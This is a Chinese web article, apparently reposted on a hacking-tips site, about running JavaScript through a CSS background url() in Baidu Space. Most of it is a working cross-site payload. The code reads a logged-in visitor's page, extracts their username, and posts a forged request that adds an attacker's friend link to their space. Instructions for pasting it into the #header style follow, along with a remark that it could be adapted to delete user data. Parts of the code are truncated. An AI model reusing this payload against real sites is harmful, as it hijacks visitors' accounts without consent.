安全吗？在CSS样式表中调用JAVASCRIPT脚本

• 近看了百度空间关于JS破坏漏洞的文章：

  　　百度空间上线后，很多网友为了宣传自己的百度空间，疯狂复制Css代码。但与此同时也出现了百度空间的网络黑手,利用百度空间的功能,加入自己的代码,而这些代码又是恶意的,导致百度空间的用户遭遇危险。

  　　这是一个网友发来的短信求助,原文如下:

  　　有个黑客用javascript把我的链接改了..并威胁我如果删除连接就删除我的空间,最怕的就是这样的人..我想问您了解一下他能用同样的手段篡改我页面的其他信息吗..最好能告诉小弟对付这样的人的办法,我实在没辙了,好郁闷..谢谢..

  　　当时笔者找到该"黑客"的空间,轻松发现其利用css代码加入js代码,然后又利用js代码的功能,分析百度空间在提交数据时的参数,构造出来一个恶意的js代码,功能是提交一个加入友情链接的请求到百度空间,导致访问该网站的已登陆百度空间用户在自己空间上自动的加一个友情链接.

  　　下边是利用代码:

  Javascript:document.body.onload = function(){
  var req = null;if(window.XMLHttpRequest) req = new XMLHttpRequest();
  else if(window.ActiveXObject){
  var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
  for(var i=0;i
  try{req.overrideMimeType('text/xml')}catch(e){}
  }
  req.open('get','.',false);
  req.send();
  var s=req.responseText;
  p=s.indexOf('passport.baidu.com/?logout');
  if(p>0)
  {
  p=s.indexOf('');
  if(p>0)
  {
  p=s.indexOf('/',p);
  p2=s.indexOf(String.fromCharCode(34),p);
  var user=s.substring(p+1,p2);
  var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 ';
  var link='http://hi.baidu.com/haomm';
  var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6Html%B7%A2%CC%FB';
  var url='/'+user+'/commit';
  var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
  req.open('post',url,false);
  req.send(data);
  }
  }
  }

  　　分析:

  　　该方法危险等级:高级.构造相应的js代码可以删除用户空间的所有数据.该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心.

  　　解决办法:

  　　由于攻击者可能利用任何用户名的百度空间提交增加,删除,更改的链接,所以目前没有完美解决办法.

  　　给已经受害者解决办法:删除恶意链接,不再在登陆的情况下访问其空间链接.

  　　利用方法,演示及声明:

  　　本空间加入了该漏洞代码的利用演示,使用方法:在自己空间css里面找到#header{},在里面加入上述代码即可.形式如:#header{height:200px;background:url("上文js代码");}请小心使用.

  发现在CSS中居然可以调用JAVASCRIPT代码,这是以前从未注意到的地方!

  主要原理是在CSS中通过设置背景对象的url属性来加入JS代码:类似如下:

  <style type="text/css">
  

• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 安全吗？在CSS样式表中调用JAVASCRIPT脚本 相关文章：
• ·路由器安全设置详解
• ·大型企业局域网安全解决方案(1)
• ·IDC 网络与系统安全部分设计方案
• ·思科路由设备安全配置建议(手册）
• ·在线杀毒地址大全(各大安全公司)
• ·10件傻事将使你的电脑不安全
• ·安全配置服务器
• ·ASP漏洞及安全建议
• ·Win2003服务器组网、安全管理全攻略(1)
• ·服务器终极安全设置与优化指南
• 安全吗？在CSS样式表中调用JAVASCRIPT脚本 相关软件
• ·Kaspersky(卡巴斯基) KIS 安全套装 V6.0.2.621 MP2 简体中文正式免激活版
• ·360安全卫士 V3.7.0.1001 标准版
• ·360安全卫士V3.6 豪华版
• ·KILL安全胄甲 V7.1
• ·McAfee 安全组合套装 2006简体中文版
• ·计算机安全与故障攻略 V1.0
• ·工程施工安全技术交底资料库 V05.15.08
• ·最安全的Vista激活程序 - Vista Loader V2.1.0
• ·360安全卫士U盘病毒专杀 V1.2
• ·360安全卫士V3.6 标准版

上一篇:网页教学网提供防止查看源代码的网页特效

下一篇:网页制作实用技巧：用图片代替提交和重置按钮

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐